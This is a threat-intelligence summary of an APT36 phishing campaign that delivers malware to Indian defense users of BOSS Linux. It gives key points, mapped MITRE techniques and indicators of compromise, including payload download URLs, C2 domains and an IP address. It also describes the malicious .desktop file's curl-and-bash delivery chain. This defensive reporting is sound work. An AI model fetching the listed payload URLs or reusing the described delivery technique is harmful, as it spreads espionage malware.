Threat Research

Phishing Attack : Deploying Malware on Indian Defense BOSS Linux

Cyfirma
Phishing Attack : Deploying Malware on Indian Defense BOSS Linux

APT36 (Transparent Tribe) has launched a sophisticated cyber-espionage campaign targeting the Indian defense sector using Linux-focused malware delivered via phishing emails. The campaign employs a multi-stage attack involving a malicious .desktop file that downloads a decoy PowerPoint and executes an ELF binary payload to gain unauthorized access. #APT36 #BOSSLinux #TransparentTribe

Keypoints

  • APT36 targets Indian defense personnel with phishing emails containing ZIP archives that include malicious .desktop shortcut files designed for Linux environments, specifically BOSS Linux.
  • The malicious .desktop file downloads and opens a fake PowerPoint presentation while silently executing a harmful ELF binary named BOSS.elf.
  • The ELF payload executes reconnaissance, evasion, data discovery, and command-and-control functions, facilitating persistent access and data exfiltration.
  • The malicious infrastructure includes the domain sorlastore.com and associated subdomains, used for payload hosting and command-and-control communications.
  • MITRE ATT&CK techniques employed include phishing, scripting, masquerading, persistence via systemd services, and command and control over non-standard ports.
  • CYFIRMA recommends enhancing email security, user training, system hardening, network monitoring, threat intelligence integration, and regular patching to mitigate risks.
  • YARA rules and IOCs such as file hashes, domains, and IP addresses are provided to aid in detection and defense efforts.

MITRE Techniques

  • [T1566] Phishing – Delivery of malicious .desktop files via phishing emails. (‘phishing emails containing .desktop files’)
  • [T1566.001] Spear Phishing Attachment – ZIP file attachments carrying malicious shortcut files. (‘ZIP file containing a .desktop shortcut file’)
  • [T1064] Scripting – Execution of embedded bash commands in the .desktop file for multi-stage payload deployment. (‘Exec line initiates a Bash shell using the bash -c command’)
  • [T1543] Create or Modify System Process – Usage of systemd services for persistence. (‘Create or Modify System Process’, ‘Systemd Service’)
  • [T1543.003] Systemd Service – Malware’s persistence mechanism involving systemd services. (‘Systemd Service’)
  • [T1543.002] Systemd Service – Privilege escalation using systemd. (‘Create or Modify System Process’)
  • [T1036] Masquerading – Use of legitimate-looking icons and file names to disguise malicious files. (‘Icon=libreoffice-impress’, masquerading as presentation file)
  • [T1564] Hide Artifacts – Silent execution of malware without terminal windows (‘Terminal=false’)
  • [T1564.001] Hidden Files and Directories – Use of /tmp directory and hidden execution to evade detection. (‘changing working directory to /tmp’)
  • [T1518] Software Discovery – Malware collects system information including hostname, CPU, RAM. (‘gathers system hostname, CPU, and RAM details’)
  • [T1518.001] Security Software Discovery – Malware inspects system services like CUPS via systemctl. (‘inspecting status of the CUPS service’)
  • [T1071] Application Layer Protocol – Command and control communication over TCP port 12520. (‘establish a TCP remote connection on port 12520’)
  • [T1095] Non-Application Layer Protocol – Maintaining connections regardless of user session. (‘nohup to run in the background’)
  • [T1105] Ingress Tool Transfer – Downloading payloads from attacker-controlled servers. (‘curl command to silently download malware’)
  • [T1571] Non-Standard Port – Use of custom TCP port 12520 for C2 communication. (‘command and control on port 12520’)

Indicators of Compromise

  • [File Hash] Malicious files – Cyber-Security-Advisory.desktop (MD5: 6eb04445cad300c2878e8fbd3cb60b52), BOSS.elf (MD5: 18cf1e3be0e95be666c11d1dbde4588e), and additional hashes: 608fff2cd4b727799be762b95d497059a202991eb3401a55438071421b9b5e7a, ace379265be7f848d512b27d6ca95e43cef46a81dc15d1ad92ec6f494eed42ab
  • [Domain] Malicious domains used for hosting and command and control – sorlastore.com, govin.sorlastore.com, modgovin.onthewifi.com
  • [URL] Payload download locations – https://govin.sorlastore.com/uploads/Cyber-Security-Advisory.pptx, https://govin.sorlastore.com/uploads/BOSS.elf
  • [IP Address] Command and Control servers – 101.99.92.182 (C2 server), 169.254.169.254 (monitored for activity)
  • [File Name] Malicious payloads – Cyber-Security-Advisory.desktop, BOSS.elf, client.elf

Read more: https://www.cyfirma.com/research/phishing-attack-deploying-malware-on-indian-defense-boss-linux/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint